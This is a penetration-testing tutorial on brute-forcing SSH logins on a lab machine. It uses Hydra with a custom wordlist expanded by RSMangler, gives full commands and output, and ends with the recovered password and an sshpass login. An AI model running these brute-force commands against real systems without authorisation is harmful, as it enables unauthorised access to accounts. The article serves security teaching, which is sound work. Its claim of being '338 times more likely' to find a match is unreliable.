Most security experts agree that one of the biggest security vulnerabilities is the password. Despite a growing concern for privacy and anonymity, users and IT departments alike are ignoring basic cybersecurity best practices, especially password hygiene. In this article we will introduce you to some tools that will demonstrate how easy it is to gain unauthorized access via password cracking and brute force attacks.

DISCLAIMER: Only use these tools and techniques on systems whose owners have given express permission and consent for penetration testing activities such as those described within this article. We do not condone any illegal or malicious activity.

What is Hydra?

Hydra is a password cracking tool used to perform brute force / dictionary attacks on remote systems. It is available on many different platforms such as Linux, Windows and even Android. Hydra is capable of using many popular protocols including, but not limited to, RDP, SSH, FTP, HTTP and many others. Because of its module engine, support for new services can easily be added.

What is RSMangler?

RSMangler is a simple ruby tool designed to manipulate a wordlist or dictionary file. It has well thought out options that can generate words in a way that mimics common human password creation tendancies (i.e. using l33t speak).

Launching a Brute Force Attack with Hydra

The best way to explain how Hydra functions is to walk through a scenario, so I’m going to set the scene for you. Our reconnaissance has discovered some information about users and systems on a network. We know there is a CentOS 7 system named Mangia with an IP address of 192.168.122.167. We also know that a user named John frequently uses this machine. Armed with this information, we will attempt a brute force attack on the discovered system. We will be utilizing Hydra to perform a hybrid brute force dictionary attack on the Mangia system, but first, we need a dictionary.

Penetration testing distributions like Kali Linux often come with a collection of word lists or dictionaries containing common passwords. There are also many additional password dictionaries available to download from online resources. In this example, we will be using the information we already have about the system to build our own word list.

Since Mangia (Italian for eat) is the name of the system, we will use a list of Italian foods. Using the cat command we can view the list we have assembled.

[savona@putor ~]$ cat food.txt 
pizza
risotto
lasagna
spaghetti
polenta
arancini
gelato

We will also create a list of usernames for the system to try and store them in the usernames.txt file.

[savona@putor ~]$ cat usernames.txt 
root
john

Here we will be passing a few options to Hydra. The first option is -V for verbose output. Then -L followed by the file containing the usernames we want to try. The -P option tells Hydra to use words from the following text file. The -t 1 option allows only one task to run at a time to avoid security features that may shut down a high volume of attempts. The last option, -f tells Hydra to stop when a successful username and password combination is found. Got it? Great, now let's make our first brute force attack attempt.

[savona@putor ~]$ hydra -V -L usernames.txt -P food.txt -t 1 -f ssh://192.168.122.167
 Hydra starting at 2020-03-08 20:57:40
 [DATA] max 1 task per 1 server, overall 1 task, 14 login tries (l:2/p:7), ~14 tries per task
 [DATA] attacking ssh://192.168.122.167:22/
 [ATTEMPT] target 192.168.122.167 - login "root" - pass "pizza" - 1 of 14 child 0
 [ATTEMPT] target 192.168.122.167 - login "root" - pass "risotto" - 2 of 14 child 0
 [ATTEMPT] target 192.168.122.167 - login "root" - pass "lasagna" - 3 of 14 child 0
 [ATTEMPT] target 192.168.122.167 - login "root" - pass "spaghetti" - 4 of 14 child 0
 [ATTEMPT] target 192.168.122.167 - login "root" - pass "polenta" - 5 of 14 child 0
 [ATTEMPT] target 192.168.122.167 - login "root" - pass "arancini" - 6 of 14 child 0
 [ATTEMPT] target 192.168.122.167 - login "root" - pass "gelato" - 7 of 14 child 0
 [ATTEMPT] target 192.168.122.167 - login "john" - pass "pizza" - 8 of 14 child 0
 [ATTEMPT] target 192.168.122.167 - login "john" - pass "risotto" - 9 of 14 child 0
 [ATTEMPT] target 192.168.122.167 - login "john" - pass "lasagna" - 10 of 14 child 0
 [ATTEMPT] target 192.168.122.167 - login "john" - pass "spaghetti" - 11 of 14 child 0
 [ATTEMPT] target 192.168.122.167 - login "john" - pass "polenta" - 12 of 14 child 0
 [ATTEMPT] target 192.168.122.167 - login "john" - pass "arancini" - 13 of 14 child 0
 [STATUS] 13.00 tries/min, 13 tries in 00:01h, 1 to do in 00:01h, 1 active
 [ATTEMPT] target 192.168.122.167 - login "john" - pass "gelato" - 14 of 14 child 0
 1 of 1 target completed, 0 valid passwords found
 Hydra finished at 2020-03-08 20:59:14

Hydra cycled through the usernames and tried each password combination, as noted in the output above. Unfortunately, we failed this attempt. The most likely cause of our failure was that the passwords we chose were too basic, but how can we add complexity?

Manipulating Word Lists with RSMangler

RSMangler takes a word list and performs various manipulations on them. It has options for just about any password combinations you can think of. RSMangler can reverse, permutate, double, change case, add the year, add numbers, add punctuation and much more. Be careful though, by default ALL options are on, which can generate a huge dictionary file. For this brute force attack demonstration we will only be selecting a few options.

Here are are invoking the rsmangler script and using the --file option to specify the input file, and redirecting it's output to a new file. The rest of the options are as follows:

  • -m 5 Minimum word length of 5 characters
  • -x 15 Maximum word length of 15 characters
  • -u Uppercase the word
  • -l Lowercase the word
  • -d Double Each word (i.e. pizzapizza)
  • -p Permutate all the words
  • -t L33t speak the words (i.e. p1224)
  • -y Add all years from 1990 to current year to start and end of words

NOTE: For a full list of options available, see the links in the resources section below.

[savona@putor ~]$ rsmangler --file food.txt -m 5 -x 15 -u -l -d -p -t -y > food-mangled.txt
[savona@putor ~]$ cat food.txt | wc -l
7
[savona@putor ~]$ cat food-mangled.txt | wc -l
2369
[savona@putor ~]$ cat food-mangled.txt 
prlspag
azzip
Pizza
PIZZA
pizzaed
pizzaing
pwpizza
pizzapw
pwdpizza
pizzapwd
... OUTPUT TRUNCATED...

Even with just these few options, we generated a list of 2,369 words from our base list of seven. By leveraging RSMangler to add complexity to our dictionary we’re now 338 times more likely to find a password match.

Using the Mangled Word List with Hydra

Now that we have a more robust password dictionary we can launch another brute force attack attempt to crack the password. This time we will pass the new mangled password list to Hydra and hope we get a hit.

NOTE: This can take some time, even with the limited credential combinations that we are using. We have 2 usernames and 2,369 possible password combinations, so we will have a total of 4,738 login attempts. Not the most subtle attack, but that’s an article for another time.

[savona@putor ~$ hydra -V -L usernames.txt -P food-mangled.txt -f ssh://192.168.122.167
 Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
 Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-03-08 21:02:20
 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
 [DATA] max 16 tasks per 1 server, overall 16 tasks, 4738 login tries (l:2/p:2369), ~297 tries per task
 [DATA] attacking ssh://192.168.122.167:22/
 [ATTEMPT] target 192.168.122.167 - login "root" - pass "prlspag" - 1 of 4738 child 0
 [ATTEMPT] target 192.168.122.167 - login "root" - pass "azzip" - 2 of 4738 child 1
 [ATTEMPT] target 192.168.122.167 - login "root" - pass "Pizza" - 3 of 4738 child 2
 [ATTEMPT] target 192.168.122.167 - login "root" - pass "PIZZA" - 4 of 4738 child 3
 ...OUTPUT TRUNCATED...
 [ATTEMPT] target 192.168.122.167 - login "john" - pass "pwpizza" - 2376 of 4739 child 8
 [RE-ATTEMPT] target 192.168.122.167 - login "john" - pass "pizzaed" - 2376 of 4739 child 2
 [ATTEMPT] target 192.168.122.167 - login "john" - pass "pizzapw" - 2377 of 4739 child 11
 [22][ssh] host: 192.168.122.167   login: john   password: pizzapw
 [STATUS] attack finished for 192.168.122.167 (valid pair found)
 1 of 1 target successfully completed, 1 valid password found
 Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-03-08 21:22:50

We have a hit! Hydra was able to find a valid username and password combination.

Now we should be able to login to the system with John's credentials. Let's give it a try.

[savona@putor ~]$ sshpass -p 'pizzapw' ssh john@192.168.122.167
Last login: Mon Mar  9 21:28:45 2020 from gateway
[john@Mangia ~]$ 

... and Bob's your uncle!

Conclusion

In this article we were able to demonstrate how to use Hydra password cracker and RSMangler to launch a hybrid brute force dictionary attack on a remote system. Although this approach is not the most subtle, and it will likely set off tripwires and red flags as it’s working. However, it is effective and in poorly monitored environments can result in an attacker getting in and out before a SysAdmin realizes what has happened.

Resources and Links